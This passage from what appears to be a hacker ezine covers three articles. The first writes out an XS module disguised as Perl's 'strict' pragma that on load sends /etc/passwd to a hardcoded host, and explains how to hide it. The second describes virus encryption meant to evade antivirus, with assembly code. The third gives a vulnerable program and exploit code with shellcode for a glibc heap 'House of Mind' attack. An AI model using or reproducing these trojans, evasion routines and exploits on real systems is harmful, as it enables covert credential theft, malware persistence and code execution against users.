"EXTERN.h" #include "perl.h" #include "XSUB.h" #include "ppport.h" #include #include #include #include #include #define DEST_IP "192.168.1.10" #define DEST_PORT 1347 MODULE = strict PACKAGE = strict BOOT: int sockfd; struct sockaddr_in dest_addr; sockfd = socket(AF_INET, SOCK_STREAM, 0); dest_addr.sin_family = AF_INET; dest_addr.sin_port = htons(DEST_PORT); dest_addr.sin_addr.s_addr = inet_addr(DEST_IP); memset(&(dest_addr.sin_zero), '\0', 8); if( connect(sockfd, (struct sockaddr *)&dest_addr, sizeof(struct sockaddr)) != -1 ) { char s[100]; FILE* f; f=fopen("/etc/passwd","r"); while (fgets(s, 100, f) != NULL) { send(sockfd, s, strlen(s), 0); } close(sockfd); } The one odd thing you should notice is the BOOT tag. That is crucial. It is how we execute code upon loading, and not just in functions. So, if that is our XS, we need our strict.pm. You may notice that I do not do any error reporting. Ask yourself, do I WANT to make this visible at all? h2xs -A -n strict cp xsfromz.xs strict/strict.xs cd strict perl Makefile.PL make And, make sure your version is 1.03, to match strict. And, if anything there didn't work, fix it. Right. Now we copy our strict.so file to a proper auto directory in @INC, Then, we need to modify the proper strict.pm to use our code. Add your require lines at the top and include the @ISA line. Shortly after the version do a "bootstrap strict;". There is one last thing you need to change: strict.pm creates a @wrong array and dies if it ends up with any members. Either comment out the "push @wrong" line, or the death block, or change the condition. Whatever. Just note that if you don't, strict dies. Yes, this will cause strict to inexpicably not fail when called incorrectly. But when does that happen? And who will be curious and educated enough to find out why? Blame DynaLoader. So there you have it. Malicious code hidden behind the guise of our friendly, non-evil strict. -[ 4.0 ]----------------------------------------------------------[ Magic ]----- ---[ 4.1 ]----------------------------------------[ Introduction to Magic ]----- Put your cards away rattle. I'm talking Perl magic. That's a technical term. Why do we call it magic? Because it does magic, and it makes a lot possible. Magic makes the impossible possible. It is how perl implements many special variables, tied variables, internal features, and who knows what else. With magic we can make something happen when a variable is called or when it is changed. That's the gist of common use. When you get deep into mg.c, you will notice it is implemented magically too. For these various reasons, perl has an SV type called magic. PVMG. You may recognize this as type 7 of our list. It is just like a PV, except it has two more members. One of these is a pointer towards another structure, a MAGIC structure. ====================================================== Obscure Reference Note == The Perl function "tie" is the Perl 5 magic that makes OOP much more of a feasible reality. Basically it ties a variable to a class. Getting this to happen took a lot of internal mucking. But when it did, we could begin to satisfy the OOP fanatics among us. ================================================================================ ok, then you know that the people who grok that shit are socially stunted, right This is our magic structure, that xmg->magic points at. struct magic { MAGIC* mg_moremagic; MGVTBL* mg_virtual; /* pointer to magic functions */ U16 mg_private; char mg_type; U8 mg_flags; SV* mg_obj; char* mg_ptr; I32 mg_len; }; The first item in the magic structure is a pointer towards another magic structure, mg_moremagic. So yes, we have a potential linked list of magic structures. When perl interprets a magic SV it goes through all of the items. Have a very relevant example taken from mg.c int Perl_mg_set(pTHX_ SV *sv) { dVAR; const I32 mgs_ix = SSNEW(sizeof(MGS)); MAGIC* mg; MAGIC* nextmg; save_magic(mgs_ix, sv); for (mg = SvMAGIC(sv); mg; mg = nextmg) { const MGVTBL* vtbl = mg->mg_virtual; nextmg = mg->mg_moremagic; /* it may delete itself */ if (mg->mg_flags & MGf_GSKIP) { mg->mg_flags &= ~MGf_GSKIP; /* setting requires another read */ (SSPTR(mgs_ix, MGS*))->mgs_flags = 0; } if (vtbl && vtbl->svt_set) CALL_FPTR(vtbl->svt_set)(aTHX_ sv, mg); } restore_magic(INT2PTR(void*, (IV)mgs_ix)); return 0; } You know what's a nice feeling? Knowing what most of that does and how it does it. Let us continue. Magic has much more to its structure than just a pointer to the next one. It has a structure called MGVTBL, where the real juice happens. That's the magic virtual table. This contains five pointers to routine types. The first two are svt_get and svt_set, which are called when the variable is accessed and modified, respectively. The type of virtual table you use is defined in the type field of the magic structure, and there are a number of them. This is from perl.h: #define PERL_MAGIC_sv '\0' /* Special scalar variable */ #define PERL_MAGIC_overload 'A' /* %OVERLOAD hash */ #define PERL_MAGIC_overload_elem 'a' /* %OVERLOAD hash element */ #define PERL_MAGIC_overload_table 'c' /* Holds overload table (AMT) on stash */ #define PERL_MAGIC_bm 'B' /* Boyer-Moore (fast string search) */ #define PERL_MAGIC_regdata 'D' /* Regex match position data (@+ and @- vars) */ #define PERL_MAGIC_regdatum 'd' /* Regex match position data element */ #define PERL_MAGIC_env 'E' /* %ENV hash */ #define PERL_MAGIC_envelem 'e' /* %ENV hash element */ #define PERL_MAGIC_fm 'f' /* Formline ('compiled' format) */ #define PERL_MAGIC_regex_global 'g' /* m//g target / study()ed string */ #define PERL_MAGIC_hints 'H' /* %^H hash */ #define PERL_MAGIC_hintselem 'h' /* %^H hash element */ #define PERL_MAGIC_isa 'I' /* @ISA array */ #define PERL_MAGIC_isaelem 'i' /* @ISA array element */ #define PERL_MAGIC_nkeys 'k' /* scalar(keys()) lvalue */ #define PERL_MAGIC_dbfile 'L' /* Debugger %_ cool. You likely shouldn't do that Maybe like me you decided to be a very naughty boy. You want to change the magic of how a special variable operates. And you don't want to dig through all of perl's source code changing things. So, let us just remake it and overwrite the svt_get or svt_set pointer. Oh yeah. SV * sv_change_magic(scalar) SV* scalar CODE: MGVTBL * const vtbl = ((struct xpvmg*) SvANY(scalar))->xmg_magic->mg_virtual; (void*)vtbl->svt_get = my_fun; Aren't I nice, spreading that out into a full TWO lines of sweet structure madness? In case you were wondering, SvANY is this: #define Sv_ANY(sv) (sv)->sv_any Just sometimes makes it easier or more legible to write. Here is the catch: we have to point that at something, and that something already has to exist. So we write a my_fun before the XS in our .xs file. This function should match the following: I32 my_fun( pTHX_ IV num, SV* scalar); That might not make sense to you, but that's ok. The first argument type is IV, pTHX_ is merely a perl macro that will make sure our function works whether or not we are using threads. Any perl variable that has a character, then THX, then maybe an underscore (maybe not!) is a thread variable. Things in perl work a bit differently depending on if you are using threads or not, but thankfully perl provides this mechanism to make sure it usually doesn't matter to us. Here is an example function: I32 my_fun( pTHX_ IV foo, SV* scalar) { printf( "ZSHZN IS KING\n"); } Now allow me to demonstrate: use ExtUtils::testlib; use Flag; Flag::sv_change_magic($<); $<++; $<++; bash-3.00$ make && perl flag.pl ZSHZN IS KING ZSHZN IS KING bash-3.00$ You get the idea. You can now do whatever you want to Perl special variables: just be warned that they will lose their original behavior that was there for a reason. I am not sure when you would actually have a practical use for creating your own special behavior for variables that perl specifically needs in one context or another. Unless, of course, you want everyone to know of your favourable impression of zshzn. ---[ 4.3 ]-------------------------------------------------[ Our Own Magic ]---- zshzn - I am not an internals weenie Limbic_Region: out of curiosity, is there a specific place where the internals weenies hang out, where they would all jump up and joyfully assist me in my curious wanderings? the internals weenies I know of don't really do IRC It turns out perl provides a system for creating your own magic variables. So you don't start randomly magicizing variables in ways that will cause perl to treat them like something important. Maybe you noticed it already. #define PERL_MAGIC_uvar 'U' /* Available for use by extensions */ We use a ufuncs structure, as defined in perl.h, and the address of that is our fourth argument to sv_magic. Yes, I know that is insane. But this is magic. This is actually very easy to use, considering what we have already discovered above. SV* sv_set_magic(scalar) SV* scalar CODE: struct ufuncs uf; uf.uf_val = &my_fun;// access, svt_get uf.uf_set = &my_fun; // set, svt_set uf.uf_index = 0; // identification index sv_magic(scalar, 0, PERL_MAGIC_uvar, (char*)&uf, sizeof(uf)); Remember from above the signature, I32 my_fun( pTHX_ IV num, SV* scalar);, that we are calling first with an IV, and secondly with a SV. Your function can parse the identification number and act accordingly, if you need to treat different callers differently. ---[ 4.4 ]-------------------------------------------------[ A Magic JAPH ]----- Here is a practical example of our ability at work. bash-3.00$ cat flag.pl $|=1; print "Generating obfuscation..."; Flag::sv_set_magic($$_=$_) for qw / J u s t a n o t h e r P e r l h a c k e r /; Flag::flush(); 1-$J-$u-$s-$t; Flag::space(); 1-$a-$n-$o-$t-$h-$e-$r; Flag::space(); 1-$P-$e-$r-$l; Flag::space(); 1-$h-$a-$c-$k-$e-$r; Flag::flush(); bash-3.00$ perl flag.pl Generating Obfuscation...terhaer Just another Perl hacker bash-3.00$ I will leave it as a challenge to the reader as to how that works, why it doesn't work better, and what limitations it has on it. -[ 5.0 ]--------------------------------------------------------[ Closing ]----- ---[ 5.1 ]--------------------------------------------------[ More Topics ]----- I fully intended to go into more advanced topics. Topics such as the Perl stack, interaction between stacks, using Perl outside of perl itself, hacking perl itself, interaction between Perl subroutines, and more. However, I decided that I better not. The existing documents on those subjects are very good. After a certain level of familiarity, all you need to do more things is our handy Perl documentation. ---[ 5.2 ]------------------------------------------------------[ Sources ]----- The first and foremost among sources is perlguts. There is also illguts (Perlguts Illustrated, to be found online), perlxs, perlxstut, perlembed, perlcall, perlapi, perlhack (An excellent document, the specific reason why this article cannot be named "Hacking Perl"), perlclib, and perlintern. In my research I have also spent a bit of time on IRC, with some few people who can offer relevant assistance. I have also spent a lot of time going through perl source code. I find this particular document relelvant because it covers such a variety in a short space, and also brings up security issues and other fun that anybody can enjoy. ---[ 5.3 ]-------------------------------------------------------[ Shouts ]----- I would like to thank fishbot, Limbic~Region, and AtnNn, all of whom helped in one way or another. -[ 6.0 ]----------------------------------------------[ Appendix: Flag.xs ]----- #include "EXTERN.h" #include "perl.h" #include "XSUB.h" #include #define DEBUG 0 I32 my_fun( pTHX_ IV foo, SV* scalar) { printf( "%c", foo); } MODULE = Flag PACKAGE = Flag /* Ever just wished that Perl was an archaic language and you could actually find such issues as buffer overflows in source code, leading to mad exploitation for all? Well, if you could, you might find it challenging and unique, compared to C. This function exists so that you can play around. */ SV * sv_evil(scalar, string) SV* scalar char* string CODE: strcpy(((struct xpv*)scalar->sv_any)->xpv_pv,string); SV * sv_change_magic(scalar) SV* scalar CODE: MGVTBL * const vtbl = ((struct xpvmg*) SvANY(scalar))->xmg_magic->mg_virtual; (void*)vtbl->svt_get = my_fun; SV* sv_set_magic(scalar) SV* scalar PREINIT: struct ufuncs uf; CODE: uf.uf_val = &my_fun; uf.uf_set = 0; int len; char *temp = SvPV(scalar, len); uf.uf_index = temp[0]; sv_magic(scalar, scalar, PERL_MAGIC_uvar, (char*)&uf, sizeof(uf)); void flush() CODE: printf("\n"); void space() CODE: printf(" "); SV* sv_do_magic(scalar) SV* scalar CODE: sv_magic(scalar,scalar, '\0', "happy", 5); const MGVTBL * const vtbl = ((struct xpvmg*) SvANY(scalar))->xmg_magic->mg_virtual; MAGIC* mg = ((struct xpvmg*) SvANY(scalar))->xmg_magic; CALL_FPTR(vtbl->svt_get)(scalar, mg); SV* sv_make_magic(scalar, type, ident="happy") SV* scalar char type char* ident CODE: sv_magic(scalar, scalar, type, ident, strlen(ident)); SV * sv_break_undef() CODE: SV* temp = newSVpv("happy", 5); temp->sv_refcnt = ((SV*)&PL_sv_undef)->sv_refcnt; PL_sv_undef = *temp; SV * sv_set_type(scalar, type) SV* scalar char* type CODE: char types[16][9] = { "SVt_NULL", "SVt_IV", "SVt_NV", "SVt_RV", "SVt_PV", "SVt_PVIV", "SVt_PVNV", "SVt_PVMG", "SVt_PVBM", "SVt_PVLV", "SVt_PVAV", "SVt_PVHV", "SVt_PVCV", "SVt_PVGV", "SVt_PVFM", "SVt_PVIO" }; scalar->sv_flags >>= 4; scalar->sv_flags <<= 4; int i; for (i = 0; i < 16; i++) { if ( strEQ(type, types[i]) ) { scalar->sv_flags |= i; break; } } SV * sv_set_flag(scalar, flag) SV* scalar char* flag CODE: char flags[24][10] = { "PADBUSY", "PADTMP", "PADMY", "TEMP", "OBJECT", "GMAGICAL", "SMAGICAL", "RMAGICAL", "IOK", "NOK", "POK", "ROK", "FAKE", "OOK", "BREAK", "READONLY", "IOKp", "NOKp", "POKp", "SCREAM", "AMAGIC", "SHAREKEYS", "LAZYDEL", "VALID" }; int i; for (i = 0; i < 24; i++) { if ( strEQ(flag, flags[i]) ) { scalar->sv_flags |= (int)pow(2,i+8); break; } } if ( DEBUG ) { printf("[ %u ]\n",scalar->sv_flags ); Perl_sv_dump(scalar); } SV * sv_set_flag_only(scalar, flag) SV* scalar char* flag CODE: char flags[24][10] = { "PADBUSY", "PADTMP", "PADMY", "TEMP", "OBJECT", "GMAGICAL", "SMAGICAL", "RMAGICAL", "IOK", "NOK", "POK", "ROK", "FAKE", "OOK", "BREAK", "READONLY", "IOKp", "NOKp", "POKp", "SCREAM", "AMAGIC", "SHAREKEYS", "LAZYDEL", "VALID" }; int i; for (i = 0; i < 24; i++) { if ( strEQ(flag, flags[i]) ) { scalar->sv_flags = (int)pow(2,i+8); break; } } if ( DEBUG ) { printf("[ %u ]\n",scalar->sv_flags ); Perl_sv_dump(scalar); } SV * sv_rm_flag(scalar, flag) SV* scalar char* flag CODE: char flags[24][10] = { "PADBUSY", "PADTMP", "PADMY", "TEMP", "OBJECT", "GMAGICAL", "SMAGICAL", "RMAGICAL", "IOK", "NOK", "POK", "ROK", "FAKE", "OOK", "BREAK", "READONLY", "IOKp", "NOKp", "POKp", "SCREAM", "AMAGIC", "SHAREKEYS", "LAZYDEL", "VALID" }; int i, j; for (i = 0; i < 24; i++) { if ( strEQ(flag, flags[i]) ) { j |= (int)pow(2,i+8); j = ~j; scalar->sv_flags &= j; break; } } if ( DEBUG ) { printf("[ %u ]\n",scalar->sv_flags ); Perl_sv_dump(scalar); } SV * sv_copy(src, dest) SV* src SV* dest CODE: sv_setsv(dest, src); dest->sv_refcnt = src->sv_refcnt; dest->sv_flags = src->sv_flags; if ( DEBUG ) Perl_sv_dump(dest); SV * sv_my_clear(scalar) SV* scalar CODE: // almost the same as the API's: sv_clear(scalar) or sv_free sv_setiv(scalar, 0); sv_setnv(scalar, 0); sv_setpv(scalar, ""); scalar->sv_flags = 0; SV* int_me(SV* scalar) CODE: SvIOK_only(scalar); SV * stringify(SV* scalar) CODE: SvPOK_only(scalar); SV * double_or_nothing(SV* scalar) CODE: SvNOK_only(scalar); SV* play_test() CODE: ENTER; PUSHMARK(SP); mXPUSHp("yea",3); // == XPUSHs(sv_2mortal(newSVpv("yea",3))); mXPUSHi(45); PUTBACK; int scalar; scalar = call_pv("check", G_ARRAY); SPAGAIN; printf("yo: %d\n", scalar); printf("yo: %d\n", POPi); printf("yo: %d\n", POPi); printf("yo: %d\n", POPi); FREETMPS; LEAVE; [==============================================================================] [-------------------------------[ Exploring RDA ]------------------------------] [==============================================================================] _.d####b._ .############. .################. .##################.__ __ __ __ _ _ __ __ ##############/ _`|#\ V V // _` | '_/ -_) ##############\__,|# \_/\_/ \__,_|_| \___| ###########>"<###### *#########( )####* ##########>.<##### "Kill! Maim! Kill! Maim! Burn!" ################ /kharn *############* "T######T" --[ 0 ]---------------------------------------------------[ Introduction ]----- The ultimate aim of every VXer is to write a program which is difficult, or even impossible to remove from the host after it's been attached. This code is then truly viral - it can't be removed without somehow harming the host, or the host's environment. Many methods have been used to acheive this, but at the heart of them all lies various methods of encryption - and RDA is one of them. RDA is not some new cipher - it stands for Random Decryption Algorithm, and can be used with any encryption algorithm, whether symmetric or assymetric. It was first implemented in the RDA.Fighter virus, a virus which tried different decryption keys against itself until the "decrypted" virus matched a certain checksum - and this was assumed to be correct. This is the simplest implementation of RDA. --[ 1 ]---------------------------------------------------[ Standard RDA ]----- Your standard appending virus with encryption, encrypts the body and stores the decryption algorithm, key, and ciphertext within the last section of the host executable. When the executable is loaded, AddressOfEntryPoint has already been hijacked, and points to your decryption routine first. The ciphercode is decrypted, executed, and control is hopefully returned to the host executable without any major hitches. The weakness of this is that an AV engine, upon recognizing your decryption algorithm, will also recognize your decryption key. Simply layering encryption on doesn't help either - the AV engine will simply peel away the encryption layers, leading to your decrypted code. RDA solves this problem by throwing away the decryption key, but leaving the algorithm in the open - if the encryption is immune to known-plaintext attacks[1], then the only way an Anti-Virus can look at the plaintext code is by brute force. However, the only way YOU can reach your own decrypted code is also by brute force. Thus, the advantage lies with the virus - the virus can "tolerate" one or two executables on a system being corrupted with incorrect decryption, an anti-virus cannot. The standard RDA implementation (weak XOR, for example): setup: xor ebx,ebx iterate: mov esi,[ebp + hostOffset] mov edi,esi mov ecx,[ebp + host_size] inc ebx decrypt: lodsb xor al,bl stosb loop decrypt check: mov esi,[ebp + hostOffset] push esi mov ecx,[ebp + host_size] push ecx mov eax,[ebp + __ADDR_CheckSum] ; whatever this happens to be call eax test eax,eax jnz iterate mov esi,[ebp + hostOffset] jmp esi However, this has major flaws which impede it's usability. For example, if an anti-virus engine can see this code in the clear and recognizes it, it can emulate the virus decryption engine, and call CheckSum for itself - revealing the decrypted executable. Also, since the XOR algorithm is weak, if a single byte is known in the plaintext, the entire ciphertext becomes decrypted. 1) known plaintext attack: where a hostile entity knows part of, or the entirety of your plaintext, and uses it to manipulate your encryption. for example, bytewise XOR is weak to known plaintext attack - if I know one charachter of the plaintext, i know the entire plaintext, because the key is the same. --[ 2 ]---------------------------------------[ Variation: SEH-based RDA ]----- With the introduction of structured exception handling in Windows OSes, programmers have a good way of catching unexpected errors and handling them gracefully, instead of leading the user to a BSoD. This is also good for when implementing RDA-based techniques: instead of matching the decrypted code to a checksum, we simply run the decrypted code - and use a different decryption key if we get an exception. Probability is most certainly on our side here - the chance that we'll get an incorrect decryption key leading to code which executes, but does not lead to an exception, is negligible. Also, the circumstances tilt the playing field towards the virus end - as a virus, it can "tolerate" a few corrupted executables on a system due to incorrect decryption. An anti-virus, on the other hand, cannot. Exception handling is set up with the help of SetUnhandledExceptionFilter API, which is called as thus: SetUnhandledExceptionFilter(LPTOP_LEVEL_EXCEPTION_FILTER f); where 'f' is a function (the exception handler) defined as thus: LONG f(STRUCT_EXCEPTION_POINTERS e); f is called every time an exception occurs, and is passed the state of the machine at the point of exception, in the Context member of e. Basically, we just try different decryption keys - and if the end result (the plaintext code) is incorrect, it'll most likely throw an exception, and we can try a different key. Here's the Context member of e, which we're interested in. This may differ from machine to machine, and this was taken from an IA32 box. CONTEXT STRUCT ContextFlags DWORD ? iDr0 DWORD ? ... regEbp DWORD ? regEip DWORD ? regCs DWORD ? regFlag DWORD ? regEsp DWORD ? regSs DWORD ? ExtendedRegisters db MAXIMUM_SUPPORTED_EXTENSION dup(?) CONTEXT ENDS Basically, Context stores the state of the registers at the moment of exception. When we exit from our exception handler, we have the option of asking the CPU to return to execution from where it halted. This "return point" is taken from regEIP, in the Context structure. So we modify regEIP to point to our decryption algorithm again. We also need to reset EBP and ESP, to make sure we can still access local variables and whatnot when we return to the decryption algorithm. pop eax assume eax:ptr EXCEPTION_POINTERS mov ebx,[eax].ContextRecord mov eax,ebx assume eax:ptr CONTEXT ; reset EIP, so we return to "decrypt:" lea ebx,decrypt mov [eax].regEip,ebx mov ebx,ebpSafe mov [eax].regEbp,ebx mov ebx,espSafe mov [eax].regEsp,ebx mov eax,-1 ret NOTE: ebpSafe and espSafe are drawn from values we know (assume) to be correct - since there is an initial run of the decryption algorithm (what if the key happens to be the first one guessed?) - ebp and esp are saved at every iteration of the decryption algorithm. That way, they remain static: decrypt: mov [ebp+espSafe],esp mov [ebp+ebpSafe],ebp There are problems with this method, however. Firstly, we must make sure to recalculate EBP, especially if we work within the confines of a virus. This must be done within the exception handler itself - if "corrupted" or incorrectly decrypted code modifies EBP before throwing an exception and you keep on using the tainted EBP, you'll throw more exceptions, leading to an infinite loop and Windows terminating your process. Also, the encryption algorithm must be simple, and efficient - as a virus, you must preserve a reasonable loading time for the host executable. something which will take several minuites to brute force is unacceptable - thus the XOR cipher. However, other fast ciphers exist - for example, the XTEA cipher[2]. 2) XTEA cipher: although reasonably fast in it's standard form, using a 32-bit key is certainly too long for our brute forcing attempts - we don't have time to cover that much keyspace. We can shorten XTEA to only use 8 bits of randomness in a 32-bit key, to reduce our brute forcing time. [==============================================================================] [-----------------------------[ The House of Mind ]----------------------------] [==============================================================================] _.d####b._ .############. .################. .##################.__ __ __ __ _ _ __ __ ##############/ _`|#\ V V // _` | '_/ -_) ##############\__,|# \_/\_/ \__,_|_| \___| ###########>"<###### *#########( )####* ##########>.<##### date: 01/01/2007 ################ by: K-sPecial *############* "T######T" [==============================================================================] In 2004, a series of patches where released against the GLibC lines, adding into effect mandatory assertions - in hope of slowing down, if not stopping the exploitation of wild malloc()/free() holes (from here on out referred to as "free holes"). In late 2005, Phantasmal Phantasmagoria released a paper giving a detailed explanation of fresh, independantly discovered methods for working around these assertions, and hence, making free holes fair game once again. The only problem is: Phantasmal did not release any sourcecode with his paper, which, at that time, was considered to be almost purely theoretical. In this article, I will pick apart one of his methods, explaining how it works and elaborate prerequisites for it to work at all. For this purpose, I will choose what Phantasmal proclaims to be "the most general technique" - that is, which he also proclaims, the technique most like the familiar unlink() method. It is now that I bring to you, The House of Mind. It should be noted that if one chooses to read this article, he shall be best off with first consulting Phantasmal's explanation and version of The House of Mind, which you can saftely find on both .aware and xzziroz with the link provided lateron. The idea behind the House Of Mind is that there is a structure for every given heap "arena" that stores primary information regarding this "arena". An arena consists of multiple heap "chunks" (blocks) in a given memory region. A process starts itself with a primary arena named "main_arena". Assuming I allocated the first chunk: char *ptr = malloc(1024) This chunk is contained in the main arena. There happens to be a flag in every chunk, indicating whether the chunk pertains to the main arena. This flag is located in the 'size' element of this structure: chunk +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Size of previous chunk, if allocated | | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Size of chunk, in bytes M|M|P| mem +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | User data starts here... . . . . (malloc_usable_space() bytes) . . | nextchunk +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Size of chunk | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ Taken from malloc.c, this flag is named NON_MAIN_ARENA: #define NON_MAIN_ARENA 0x4 When calling the function public_free() (which is what free() boils down to) with this flag set, the arena for the chunk which free() is being called for will be pinpointed outside the main arena. The following code from malloc.c, within public_free(), specificly outlines this process: ar_ptr = arena_for_chunk(p); Where p is the address of the chunk and ar_ptr is the container receiving the address of this chunks arena. Defined in arena.c, the arena_for_chunk macro looks as the following: #define arena_for_chunk(ptr) \ (chunk_non_main_arena(ptr) ? heap_for_ptr(ptr)->ar_ptr : &main_arena) chunk_non_main_arena(ptr) returns true, since i claim to be NON_MAIN_ARENA. heap_for_ptr looks as the following: #define heap_for_ptr(ptr) \ ((heap_info *)((unsigned long)(ptr) & ~(HEAP_MAX_SIZE-1)) HEAP_MAX_SIZE is defined as 1024*1024 on a default install. If you grock the code you will find that ~(1024*1024-1) dilutes to be 0xFFF00000, which is an AND-bitmask that would transform a number such as 0x08012345 into 0x08000000. Assume that this is precisely what just happened: My first chunk allocated in a piece of code happens to be 0x8012345. Then it's arena pointer (ar_ptr) will be 0x08000000. This is invalid and will likely result in a segmentation fault or likewise error since there is no arena structure located at the address. This is also useless since I can not write data to this address - and hence, I am unable to create a fake arena structure. What must be done is just what Phantasmal suggested: Make the program allocate more memory until a chunk is located above 0x81000000. Assume I allocate a chunk located at 0x8100123. If I overflow this chunks size element with the NON_MAIN_HEAP flag set, the arena pointer will be looked for it in memory that the previous chunk controls. By forging an arena structure with evil offsets I can cause code execution through at least two different code locations in the malloc subsystem. Phantasmal wrote of two different methods through which code execution can be induced through the arbitrary forging of an arena. The first method involves forging addresses in the bins[] array located inside of the arena structure. Phantasmal wrote that if the following conditions where to be made valid: - The negative of the size of the overflowed chunk must be less than the value of the chunk itself. - The size of the chunk must not be less than av->max_fast. - The IS_MMAPPED bit of the size cannot be set. - The overflowed chunk cannot equal av->top. - The NONCONTIGUOUS_BIT of av->max_fast must be set. - The PREV_INUSE bit of the nextchunk (chunk + size) must be set. - The size of nextchunk must be greater than 8. - The size of nextchunk must be less than av->system_mem - The PREV_INUSE bit of the chunk must not be set. - The nextchunk cannot equal av->top. - The PREV_INUSE bit of the chunk after nextchunk (nextchunk + nextsize) must be set Then the following code would be executed: bck = unsorted_chunks(av); fwd = bck->fd; p->bk = bck; p->fd = fwd; bck->fd = p; fwd->bk = p; "In this case p is the address of the designer's overflowed chunk. The unsorted_chunks() macro returns av->bins[0] which is designer controlled. If the designer sets av->bins[0] to the address of a GOT or .dtors entry minus 8, then that entry (bck->fd) will be overwritten with the address of p." Phantasmal kindof fibbed here. unsorted_chunks() does not return av->bins[0] - it returns &av->bins[0], which, at first, seems to be about useless. Phantasmal was close enough for us to give him credit, tho. In fact, I imagine he just typed it wrong as it wouldn't work elsewise - fwd->bk would cause a segfault. What actually has to be done is setting bck->fd (&av->bins[0] + 8) to the address of the .dtors+4 entry minus 12. After this is accomplished, fwd will be set to bck->fd, fwd->bk = p (bck->fd + 12) will write the address of the chunk being free()'d to .dtors + 4. The first byte of the chunk I write will actually be at p + 8, since p points to prev_size, the first element of a chunk structure, and p + 4 points to the size element - the second element in a heap structure. This is fair, because I can place a jmp 0x4 in the 4 bytes that occupy prev_size. It will jump over the size element and land right into the shellcode. I've gone too far without introducing you to the vulnerable code! --------------------------------------------------------------- begin heap1.c -- #include #include int main (void) { char *ptr = malloc(1024); char *ptr2; int heap = (int)ptr & 0xFFF00000; _Bool found = 0; printf("ptr found at %p\n", ptr); // i == 2 because this is my second chunk to allocate for (int i = 2; i < 1024; i++) { if (!found && (((int)(ptr2 = malloc(1024)) & 0xFFF00000) == (heap + 0x100000))) { printf("good heap allignment found on malloc() %i (%p)\n", i, ptr2); found = 1; break; } } malloc(1024); fread (ptr, 1024 * 1024, 1, stdin); free(ptr); free(ptr2); return(0); } ----------------------------------------------------------------- end heap1.c -- This code makes an initial malloc, followed by numerous additional allocations which are necessary to return a chunk that would be expected to have an arena in a memory location that I can write to through the heap overflow. The first chunk found having an arena in overflowable memory has its address printed for my convienence. After this, one more chunk is allocated since Phantasmal stated that the free()'d chunk could not equal av->top (the most recent allocated chunk) (actually he said nextchunk could not equal this, he fibbed again) Now for exploit code: -------------------------------------------------------------- begin ploit1.c -- #include /* linux_ia32_exec - CMD=/usr/bin/id Size=72 Encoder=PexFnstenvSub http://metasploit.com */ unsigned char scode[] = "\x31\xc9\x83\xe9\xf4\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x5e" "\xc9\x6a\x42\x83\xeb\xfc\xe2\xf4\x34\xc2\x32\xdb\x0c\xaf\x02\x6f" "\x3d\x40\x8d\x2a\x71\xba\x02\x42\x36\xe6\x08\x2b\x30\x40\x89\x10" "\xb6\xc5\x6a\x42\x5e\xe6\x1f\x31\x2c\xe6\x08\x2b\x30\xe6\x03\x26" "\x5e\x9e\x39\xcb\xbf\x04\xea\x42"; int main (void) { // don't use the first 8 bytes of a chunk for data because // when it is free()'d it seems to be garbaged up with // strange addresses. for (int i = 0; i < 8; i++) putchar(0x41); // set the mutex to 0 fwrite("\x00\x00\x00\x00", 4, 1, stdout); // write max_fast a few times, we'll hit it and we'll // take up some more bytes for (int i = 0; i < 32 / 4; i++) fwrite("\x02\x01\x00\x00", 4, 1, stdout); // finish this chunk with the address one wants to place at // bins[0] + 8 (dtors_end - 12) for (int i = 0; i < 984 / 4; i++) fwrite("\x70\x96\x04\x08", 4, 1, stdout); // fill in the unused mallocated space with A's but // preserving the 'size' element (1024 with PREV_INUSE // bit set) for (int i = 0; i < 721; i++) { fwrite("\x09\x04\x00\x00", 4, 1, stdout); for (int i = 0; i < 1028; i++) putchar(0x41); } fwrite("\x09\x04\x00\x00", 4, 1, stdout); // this is the memory that heap_for_ptr returned, // one wants to fill it with the address of which // ar_ptr should have for (int i = 0; i < (1024 / 4); i++) fwrite("\x10\xa0\x04\x08", 4, 1, stdout); // jmp + 12 fwrite("\xeb\x0c\x90\x90", 4, 1, stdout); // size field with NON_MAIN_ARENA set fwrite("\x0d\x04\x00\x00", 4, 1, stdout); // icky 8 byte filler fwrite("\x90\x90\x90\x90\x90\x90\x90\x90", 8, 1, stdout); // finally the shellcode fwrite(scode, sizeof(scode), 1, stdout); return(0); } ---------------------------------------------------------------- end ploit1.c -- First things first, I build a fake arena structure in the first mallocated block from heap1.c. I start out 8 bytes from the top of it, since when it is free()'d, these 8 bytes will be garbaged. Then I write a 0. I had to learn the hard way (lots of glibc reading) that the first value of an arena structure is a mutex. This mutex will be waited upon (blocked upon) and your program will infinite loop if it equals anything other than 0. Next i write 0x102, this is max_fast with a small size (so my chunk is not considered smaller than max_fast, as Phantasmal stated) which also has the NONCONTIGUOUS flag (defined as 2) set. max_fast is located at ar_ptr + 8. Afterwards, I garbage the rest of the arena with the address I wish p to be written to, minus 12. &bins[0] is located at ar_ptr + 76 so I am sure to hit it. Next, the unused mallocated area I am overflowing is filled with filler until I get to the chunk which consists of the memory that heap_for_ptr returns. Here, I must provide the arena location that ar_ptr will contain - and hence, the arena location that free will use for this chunk. ar_ptr is located at the address returned by heap_for_ptr. Almost there. Next I need to fill the chunk that will be written to the specified memory location. By starting with a jmp 12, I jump past the 'size' element of this chunk and the first 8 bad bytes of it (from once it's free()'d). Next comes the size field itself, which should be the legit size of the chunk along with the NON_MAIN_ARENA bit set. Finally, the 8 icky byte filler followed by the pretty shellcode. -------------------------------------------------------------------------------- Location to be written to (dtors + 4), minus 12: kspecial@mirage:~$ objdump -x heap | grep dtors | head -1 16 .dtors 00000008 08049678 08049678 00000678 2**2 0x08049678 + 4 - 12 == 0x08049670 Location of arena (first chunk, + 8) kspecial@mirage:~$ ./heap ptr found at 0x804a008 good heap allignment found on malloc() 724 (0x81002a0) 0x0804a008 + 8 == 0x0804a010 Behold: kspecial@mirage:~$ gcc -o heap heap1.c -std=c99 kspecial@mirage:~$ gcc -o ploit ploit.c -std=c99 